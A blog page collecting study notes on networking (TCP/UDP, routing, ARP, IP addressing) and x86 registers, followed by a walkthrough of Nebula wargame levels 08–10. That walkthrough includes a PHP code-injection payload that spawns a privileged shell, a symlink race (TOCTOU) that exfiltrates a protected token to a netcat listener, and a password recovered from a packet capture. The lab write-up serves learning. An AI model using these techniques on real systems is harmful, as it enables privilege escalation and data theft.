blog.smigiel.dev

Sep 21, 2020

Networking Pt 3: TCP and UDP

TCP & UDP

There are two common transport protocols used on the Internet: TCP (Transmission Control Protocol) and UDP (User Datagram Protocol). TCP is the most used transport protocol on the Internet. The vast majority of applications use it, and the IP protocol suite is often called TCP/IP. UDP is much simpler. It doesn't guarantee packet delivery and it is conectionless. Thanks to those features, it is much faster than TCP, it provides better throughput. It is often used by multimedia applications that can tolerate packet loss but are througput intensive. It is often used in VoIP and video streaming applications where you can tolerate a little glitch in the audio or video.

TCP UDP
Connection oriented protocol Connectionless
Rearranges data packets in the order specified No inherent order as all packets are independent of each other.
Slower speed than UDP UDP is faster, because error recovery is not attepmted. It is "best effort" protocol
Data is read as byte stream, no distinguishing information is sent to signal message boundaries Packets are sent individually and are checked for integrity only when they arrive. Packets have definite boundaries, meaning a read operation at the receiver socket will yield an entire message as it was originally sent.

Ports

Ports are used to identify a single network process on a machine. When some process is establishing connection to external internet resource (browser -> website), there is port open, associated with browser. Information about the port is later sent as part of header in TCP or UDP packet. In the case of aforementioned connection, source port would be the same, that was created for browser. Destination port then is associeated with website (usually 80 or 443). This is the way how process know where information needs to be addressed.

TCP handshake

In the case of UDP, which is connectionless, there is no handshake. However, for TCP, before any kind of transmission can happen, there needs to be established connection. It is done in so called three-way handshake. The header fields involved in the handshake are: sequence number, acknowledgement numbers, SYN and ACK flags

  1. The client sends a TCP packet to the server with the SYN flag enabled and a random sequence number.
  2. The server replies by sending a packet with both the SYN and ACK flags. Sequence number is again chosen as random, but ACK is seq number + 1.
  3. The client completes the synchronization by sending an ACK packet. The ACK is seq number + 1 and sequence number is ACK + 1 from the second step.
Host 1 | flags | Host 2
-------|-------|--------
-----> |SYN    |
    Seq: 328, ACK: 0

       |SYN/ACK| <------
    Seq: 412, ACK: 329

------>|ACK    |
    Seq: 330, ACK: 413

Additional resources

Sep 19, 2020

Networking Pt 2

Routing

A router is a networking device that forwards data packets between computer networks. A router os connected to two or more data lines from different IP networks. When a data packet comes in one of the lines, the router reads the network address information in the packet header to determine the destination. Then, based on routing table, it directs the packet to the next network. Routing table contains information about the topology of the network immediately around it. The table can also contain an entry with the default address 0.0.0.0. This entry is used when the router receives a packet whose destination is an unknown network.

Routing table example (router)

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
87.169.144.1    0.0.0.0         255.255.255.255 UH        0 0          0 eth0
192.168.1.0     0.0.0.0         255.255.255.0   U         0 0          0 br0
87.169.144.0    0.0.0.0         255.255.252.0   U         0 0          0 eth0
127.0.0.0       0.0.0.0         255.0.0.0       U         0 0          0 lo
0.0.0.0         87.169.144.1    0.0.0.0         UG        0 0          0 eth0

The kernel reads routing table from the top down. The first column is the destination. The second column tells how to reach that destination. The default gateway is always shown with the destination 0.0.0.0. The IP address in the gateway column is that of the outbound gateway router. The netmask for the default gateway means that any packet not addressed to the local network or another outbound router by additional entries in the routing table are to be sent to the default gateway regardless of the network class.

Networking Layer 2

Every host on a network has both an IP and a MAC address. When server A wants to send a packet to server B:

  1. server A creates a packet:
    • the destination IP address of server B in the IP header of the datagram.
    • the destination MAC address of the router in the link layer header of the frame.
    • the source IP address of the server A.
    • the source MAC address of the server A.
  2. router takes a packet and forwards it to server B (the destination MAC address is the MAC address of the next hop):
    • the destination MAC address is rewritten to server B
    • the source MAC address is of router.
    • Only MAC address is changed. IP address stays the same (both source and destination). This is global information and remains the same along the packet trip.

MAC address

MAC address is a unique identifier assigned to a network interface controller (NIC). It is assigned by device manufacturer: typically includes a manufacturer's organizationally unique identifier. MAC address is 48 bit (6 bytes) long and is expressed in hexadecimal form: AA:BB:CC:DD:EE:FF.

The IEEE has built in special address to allow more than one NIC to be addressed at one time. It's called broadcast address: FF:FF:FF:FF:FF:FF. Frame with this address is delivered to all devices in the local network.

Network segmentation

Switches do not segment networks. Only routers do so. Usually, every interface of a router is connected to different network. This is the reason, why routers do not forward broadcast packets, like switches.

Packet forwarding

To forward a packet:

  • the switch reads the destination MAC address of the frame.
  • it performs a look-up in the CAM table.
  • it forwads the packet to the corresponding interface.
  • if there is no entry with the MAC address, the switch will forward the frame to all its interfaces.

Address Resolution Protocol (ARP)

The ARP is a communication protocol used for discovering the link layer address, such as a MAC address, associated with a given internet layer address, typically an IPv4 address.

Example of workflow

Two computers are connected to the same local network. Computer A wants to send packet to Computer B. Through DNS, it determines Computer B IP address 192.168.0.2. To send message, Computer A also requires MAC address.

  1. Computer A retrieves cached information from ARP table for 192.168.0.2

    • if the cache didn't produce a result for IP address, Computer A sends broadcast ARP request message FF:FF:FF:FF:FF:FF, requesting an answer for 192.168.0.2.
  2. Based on retrieved information, Computer A sends packet with MAC adress and IP address.

ARP table has time-to-live (TTL) for every entry. When it expires, or on power off, host discards entries.

Additional resources

Sep 17, 2020

Networking

Protocols

What is packet

Every packet in every protocol has Header (control information) and Payload (user data) structure. The header has a protocol-specific structure: this ensures that the receiving host can correctly interpret the payload and handle the communication. The payload is the actual information. It could be something like part of an email message or the content of a file during a download.

IPv4 protocol header is at least 160 bits (20 bytes) long, and it includes 14 fields, of which 13 are required. Last field, called options is optional. IPv4 packet - Wikipedia Source: Wikipedia, author MichelBakni

Using the information in the header, the nodes involved in the communication can understand and use IP packets.

Protocol layers

Most of the time, when people talk about layers, they think about OSI model. OSI model promoted the idea of a consistent model of protocol layers, defining interoperability between network devices and software. Based on that we can think about seven layers (more here). What we need to know is, that each protocol has header and payload. It goes from top to bottom. Every next layer is encapsulating the layer before in the form of payload.

Encapsulation

If we look from 10.000 foot perspective, we can see only data packet. However, if we look at this closer, it's starting showing some interesting properties. Every layer contains paylod in a form of header+payload from previous layer. It means, that at the lowest level, we're looking at

(header + (header + (header + (header + payload))))

This kind of behavior happens to every packet sent by host. On the other side of pipeline, receiving host, needs to unpack all the information, with regards to correct layers.

Internet Protocol (IP)

IP Address

IPv4 Address

IPv4 address consists of 4 bytes (octets). A dot delimits every octet in the address. Each byte (2^8) can represent value 0 to 255.

 172.22.128.47

Special use IPv4 addresses

RFC5735 describes IPv4 addresses, which cannot be assigned to host, due to its special use case. Common addresses, that are in use:

127.0.0.0/8    <-- host loopback address.
169.254.0.0/16 <-- communication between hosts, without DHCP server cannot be found.
192.168.0.0/16 <-- private networks.

Network classes

Internet addresses are allocated by the InterNIC organization. The most common classes are A, B and C. D and E exist, but are not used by end users. Each of classes has different default subnet mask.

  • Class A: uses 255.0.0.0 (CIDR /8) and have 0-127 as first octet,
  • Class B: uses 255.255.0.0 (CIDR /16) and have 128-191 as first octet,
  • Class C: uses 255.255.255.0 (CIDR /24) and have 192-223 as first octet.
  • Class D: range 224-239 as first octet, used for multicasting
  • Class E: range 240-255 as first octet, not available for general use, reserved for research purposes.

CIDR

Subnet with all zeros is reserved for the referring to the network itself, while last address, all ones is used as broadcast address for the network. It means, that from network, two addresses are unavailable. In the world of CIDR, /31 and /32, would be unusable, due to above requirement. That's why RFC3021 created an exception. Network /31 is usable for point-to-point links, while /32 (single-host network) must be accessed by explicit routing rules, as there is no room in such a network for a gateway.

IPv6

RFC3513 (obsolete now) and RFC4291 describes IPv6 addressing architecture. This version allows to address 2^128 devices (approximately 3.4*10^38). It's been introduced in December 1995, but still majority of Internet relies on IPv4. IPv6 is divided into two parts (each 64 bits): network identifier and interface identifier. Furthermore, the first 64 bits ends with a dedicated 16-bits space that can be used only for specifying a subnet.

Additional resources

Sep 16, 2020

General Purpose Registers

Basics

There are 8 generic purpose registers:

Naming convention Name Purpose
EAX Accumulator Used in arithmetic operations
EBX Base Pointer Used as a pointer to data
ECX Counter Used in shift/rotate instructions and loops
EDX Data Used in arithmetic operations and I/O
ESP Stack Pointer Pointer to the top of the stack
EBP Base Pointer (Stack Base Pointer, Frame Pointer ) Pointer to the base of the stack
ESI Source Index Used as a pointer to a source in stream operation
EDI Destination Used as a pointer to a destination in stream operation

Additionally, exists EIP (Instruction Pointer) which controls the program execution. It contains the address of the next instruction to be exetucted (it tells the CPU where the next instruction is).

Program Memory

Running process is usually organized in 2 sections: read-only and read/write.

  • .text - address space where program's executable instructions is stored.
  • .data - global and static variables which have pre-defined value and can be modified.
  • BSS (Block Started by Symbol) - uninitialized data, is usually adjacent to .data segment. Contains all global and static variables which are initialized to zero or do not have specific explicit initialization in source code.
  • Heap - area commonly begins at the end of BSS and .data segments. and grows to larger addresses from there. This area is managed by malloc, realloc and free. This area is shared by all threads, shared libraries, and dynamically loaded modules in a process.
  • Stack - typically located in the higher parts of memory. ESP tracks the top of the stack.

Heap grows towards higher memory addresses. Stack grows towards lower memory addresses.

Lower address | .text | .data | BSS | Heap -> ... <- Stack | Higher address

Stack

The Stack is Last-in First-out (LIFO). It is array for saving addresses, passing function arguments, and storing local variables. There are two operations PUSH/POP to work with stack. With each operation, ESP is updated. Because stack grows towards lower addresses of memory, when we PUSH something on stack, stack pointer is reduced ESP-4 (-4 for 32 bits, -8 for 64 bits). When we remove something from stack by POPing it, ESP changes address again ESP+4.

PUSHed data is written to the stack memory, and later ESP address is updated ESP-4. POPped data is read from the stack and written to given register POP EAX

Values POPed from stack are not deleted/removed. They stay in stack until another instruction overwrites it.

Additional resources:

Sep 07, 2020

Exploit Education - Nebula Part 3

Level 08

Solution

This sounds easy enough. Just go to flag08 directory and see what kind of files are there. At first, I felt intimidated by root:root access to capture.pcap file. However, it occured that the file allows to be read by anyone. In that case, we might be able to copy it and retrieve necessary information.

Result

After downloading capture.pcap I was able to open it with wireshark, where I've seen some tcp traffic. By selecting Follow TCP I've noticed that this is dump of someone's login attempts.

..wwwbugs login: l.le.ev.ve.el.l8.8
..
Password: backdoor...00Rm8.ate
.
..
Login incorrect
wwwbugs login:

However, hex dump shows some more details

000000B9  62                                                 b
000000BA  61                                                 a
000000BB  63                                                 c
000000BC  6b                                                 k
000000BD  64                                                 d
000000BE  6f                                                 o
000000BF  6f                                                 o
000000C0  72                                                 r
000000C1  7f                                                 .
000000C2  7f                                                 .
000000C3  7f                                                 .
000000C4  30                                                 0
000000C5  30                                                 0
000000C6  52                                                 R
000000C7  6d                                                 m
000000C8  38                                                 8
000000C9  7f                                                 .
000000CA  61                                                 a
000000CB  74                                                 t
000000CC  65                                                 e
000000CD  0d                                                 .

One can notice, that x7f equals to backspace. It probably means, that user pressed wrong key, and removed it. After decyphering it, it seems to be backd00Rmate.

➜  ~ ssh flag08@nebula
flag08@nebula:~$ ls
capture.pcap
flag08@nebula:~$ getflag
You have successfully executed getflag on a target account
flag08@nebula:~$

Level 09

I couldn't crack this one, so I searched for solution over the internet. This one is explaining it very good: Lucian Nitescu. Unfortunately, my php knowledge is not the best.

Solution

We need to use both $filename and $use_me variables. First one needs to contain payload, second will contain program name.

Result

level09@nebula:~$ cat exploit.php
[email {${system(sh)}}]
level09@nebula:~$ ~flag09/flag09 exploit.php .
PHP Notice:  Use of undefined constant sh - assumed 'sh' in /home/flag09/flag09.php(15) : regexp code on line 1
sh-4.2$ whoami
flag09
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$

Interesting that, when I replaced sh with bash it is not working:

PHP Notice:  Use of undefined constant bash - assumed 'bash' in /home/flag09/flag09.php(15) : regexp code on line 1
bash-4.2$ whoami
level09
bash-4.2$ getflag
getflag is executing on a non-flag account, this doesn't count

One can always provide $use_me variable too.

level09@nebula:~$ cat exploit.php
[email {${system($use_me)}}]
level09@nebula:~$ ~flag09/flag09 exploit.php getflag
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

level09@nebula:~$ ~flag09/flag09 exploit.php sh
sh-4.2$ whoami
flag09

Level 10

TOCTOU == Time of Check, Time of Use

This is another one, where I spent significant amount of time. Even if I know how it suppose to work, I haven't been able to implement the solution correctly.

Solution

Time of Check, Time of Use means, that when program is running, it needs to verify an access to file, where we have an access. However, after doing that, we need to swap this file, with another one, which is unavailable to us.

Result

Nebula instance:

level10@nebula:~$ touch my_file
level10@nebula:~$ while true; do ln -sf /home/flag10/token token; ln -sf my_file token; done &
[1] 4467
level10@nebula:~$ while true; do /home/flag10/flag10 token debian; done
You don't have access to token
You don't have access to token
Connecting to debian:18211 .. Connected!
Sending file .. wrote file!
Connecting to debian:18211 .. Unable to connect to host debian

Second instance

dasm@debian:~$ nc -klp 18211 > received
dasm@debian:~$ cat received
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27

Nebula instance

level10@nebula:~$ su flag10
Password:  # use found token
sh-4.2$ getflag
You have successfully executed getflag on a target account
← Previous Next → Page 2 of 3